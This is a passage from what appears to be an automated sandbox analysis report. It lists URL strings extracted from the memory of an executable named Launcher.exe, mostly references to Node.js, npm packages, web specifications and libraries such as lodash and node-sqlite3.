          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/3394
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34010
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34103#issuecomment-652002364
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34375
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34385
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/35949#issuecomment-722496598
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/36061#discussion_r533718029
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/38248
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/38433#issuecomment-828426932
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/38614)
          Source: Launcher.exe, 00000000.00000003.1459581379.00000174E09F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1474969662.00000174E0693000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/normalize/mz
          Source: Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/cli)
          Source: Launcher.exe, 00000000.00000003.1251349025.000000A8F3201000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1191986739.00000174E0518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/inflight.git
          Source: Launcher.exe, 00000000.00000003.1207851036.00000174E0677000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1261591068.00000112103C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1223499690.00000174E0663000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1223499690.00000174E0677000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/node-tar/blob/51b6627a1f357d2eb433e7378e5f05e83b7aa6cd/lib/header.js#L349
          Source: Launcher.exe, 00000000.00000003.1251349025.000000A8F3201000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/wrappy
          Source: Launcher.exe, 00000000.00000003.1251349025.000000A8F3201000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/wrappy/issues
          Source: Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/orlandov)
          Source: Launcher.exe, 00000000.00000003.1264593951.00000177B9F41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1142630915.00000174E08DE000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155795784.00000174E0950000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1142630915.00000174E08F2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1152549783.00000174E0804000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/phated)
          Source: Launcher.exe, 00000000.00000003.1415719735.00000174E04D6000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1386717023.000000726FF41000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/prebuild/node-gyp-build
          Source: Launcher.exe, 00000000.00000003.1386717023.000000726FF41000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/prebuild/node-gyp-build.git
          Source: Launcher.exe, 00000000.00000003.1386717023.000000726FF41000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/prebuild/node-gyp-build/issues
          Source: Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/prebuild/prebuild-install)
          Source: Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/prebuild/prebuild/issues/174)
          Source: Launcher.exe, 00000000.00000003.1383748633.000000726FF41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1446641647.00000174DE4AA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1396760803.00000174E0DA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/primno/dpapi#readme
          Source: Launcher.exe, 00000000.00000003.1383748633.000000726FF41000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/primno/dpapi#readme8&uJ
          Source: Launcher.exe, 00000000.00000003.1383748633.000000726FF41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1446641647.00000174DE4AA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1396760803.00000174E0DA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/primno/dpapi.git
          Source: Launcher.exe, 00000000.00000003.1383748633.000000726FF41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1446641647.00000174DE4AA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1396760803.00000174E0DA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/primno/dpapi/issues
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyneo)
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/rogerwang/node-webkit#downloads
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/rogerwang/node-webkit)
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/rogerwang/node-webkit).
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/rogerwang/node-webkit/wiki/Using-Node-modules)
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/rogerwang/nw-gyp)
          Source: Launcher.exe, 00000000.00000003.1260785845.0000015B71801000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/rvagg)
          Source: Launcher.exe, 00000000.00000003.1202995845.00000174E0942000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1260785845.0000015B71801000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/rvagg/bl
          Source: Launcher.exe, 00000000.00000003.1260785845.0000015B71801000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/rvagg/bl.git
          Source: Launcher.exe, 00000000.00000003.1260785845.0000015B71801000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/rvagg/bl.gitA
          Source: Launcher.exe, 00000000.00000003.1260785845.0000015B71801000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/rvagg/bl1f
          Source: Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/ry)
          Source: Launcher.exe, 00000000.00000003.1462539823.00000174E0520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/shellac
          Source: Launcher.exe, 00000000.00000003.1280865643.0000036048281000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/sponsors/RubenVerborgh
          Source: Launcher.exe, 00000000.00000003.1264593951.00000177B9F41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155795784.00000174E0944000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/sponsors/isaacs
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/springmeyer)
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/sqlcipher/sqlcipher)
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/standard-things/esm/issues/821.
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/ecma262/blob/HEAD/LICENSE.md
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/ecma262/issues/1209
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/proposal-iterator-helpers/issues/169
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/proposal-ses/blob/e5271cc42a257a05dcae2fd94713ed2f46c08620/shim/src/freeze.j
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/tc39/proposal-weakrefs
          Source: Launcher.exe, 00000000.00000003.1317934326.00000174E5501000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1342161238.00000174E07AC000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1282750493.00000177B9F41000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/tlrobinson/long-stack-traces
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tmcw)
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tryghost/node-sqlite3/raw/master/LICENSE).
          Source: Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tryghost/node-sqlite3/tarball/master
          Source: Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tryghost/node-sqlite3/wiki/Control-Flow)
          Source: Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tryghost/node-sqlite3/wiki/Debugging)
          Source: Launcher.exe, 00000000.00000003.1108487541.00000174E005C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/vercel/pkg/issues/1589
          Source: Launcher.exe, 00000000.00000003.1210752491.00000174E0888000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1210752491.00000174E0878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/webpack/webpack/issues/4175#issuecomment-342931035
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/willwhite)
          Source: Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/yarnpkg/yarn)
          Source: Launcher.exe, 00000000.00000003.1175489451.00000174E0401000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1130016639.00000174E05EF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1134655854.00000174E05EF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1255111010.000002C308E41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1185814574.00000174E0934000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1177023374.00000174E086B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/yetingli
          Source: Launcher.exe, 00000000.00000003.1140870149.00000174E0581000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1130016639.00000174E0575000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1134655854.00000174E05BF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1130016639.00000174E05BB000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1134655854.00000174E05F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/yqnn/node-readdir-glob#options
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://goo.gl/t5IS6M).
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#Replaceable
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#define-the-operations
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-class-string
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-default-iterator-object
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#dfn-iterator-prototype-object
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-interfaces
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterable
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterable-entries
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-iterators
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-namespaces
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-operations
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://heycam.github.io/webidl/#es-stringifier
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#ascii-serialisation-of-an-origin
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#concept-origin-opaque
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-setinterval
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/webappapis.html#windoworworkerglobalscope
          Source: Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/badge/N--API-v3-green.svg)
          Source: Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/badge/N--API-v6-green.svg)
          Source: Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/github/release/TryGhost/node-sqlite3.svg)
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://infra.spec.whatwg.org/#forgiving-base64
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://infra.spec.whatwg.org/#forgiving-base64-decode
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://invisible-island.net/ncurses/terminfo.ti.html#toc-_Specials
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://jimmy.warting.se/opensource
          Source: Launcher.exe, 00000000.00000003.1142630915.00000174E08FE000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1196985642.00000174E08FA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1281112162.000000726FF41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155795784.00000174E0930000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1154654438.00000174E08FE000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1156398710.00000174E054B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1154654438.00000174E08BD000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1264593951.00000177B9F41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1152549783.00000174E0808000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1146130990.00000174E0808000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1150589121.00000174E0656000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1140870149.00000174E0542000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155795784.00000174E0911000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1142630915.00000174E08FA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1154654438.00000174E08FA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155795784.00000174E0940000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1182279794.00000174E08F6000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1150933749.00000174E0857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jquery.org/
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://linux.die.net/man/1/dircolors).
          Source: Launcher.exe, 00000000.00000003.1264593951.00000177B9F41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1142630915.00000174E08DE000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1152549783.00000174E0808000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1146130990.00000174E0808000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155795784.00000174E0950000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1150589121.00000174E0656000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1140870149.00000174E0542000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155795784.00000174E0911000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1142630915.00000174E08F2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1142630915.00000174E08FA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1152549783.00000174E0804000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1154654438.00000174E08FA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155795784.00000174E0940000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1150589121.00000174E0651000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lodash.com/
          Source: Launcher.exe, 00000000.00000003.1264593951.00000177B9F41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1142630915.00000174E08DE000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155795784.00000174E0950000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1142630915.00000174E08F2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1152549783.00000174E0804000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lodash.com/icon.svg
          Source: Launcher.exe, 00000000.00000003.1142630915.00000174E08FE000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1196985642.00000174E08FA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1281112162.000000726FF41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155795784.00000174E0930000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1154654438.00000174E08FE000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1156398710.00000174E054B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1154654438.00000174E08BD000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1264593951.00000177B9F41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1152549783.00000174E0808000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1146130990.00000174E0808000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1150589121.00000174E0656000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1140870149.00000174E0542000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155795784.00000174E0911000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1142630915.00000174E08FA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1154654438.00000174E08FA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155795784.00000174E0940000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1182279794.00000174E08F6000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1150933749.00000174E0857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lodash.com/license
          Source: Launcher.exe, 00000000.00000003.1229981135.00000174E060D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1302231555.00000174E0383000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1232344631.00000174E0380000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1200499229.00000174E05FD000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1302709891.00000174E040D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mapbox.com/
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mapbox.com/)
          Source: Launcher.exe, 00000000.00000003.1264593951.00000177B9F41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1142630915.00000174E08DE000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155795784.00000174E0950000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1142630915.00000174E08F2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1152549783.00000174E0804000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mathiasbynens.be/)
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://mathiasbynens.be/notes/javascript-encoding
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://no-color.org/
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/api/cli.html#cli_unhandled_rejections_mode).
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://nodejs.org/api/fs.html
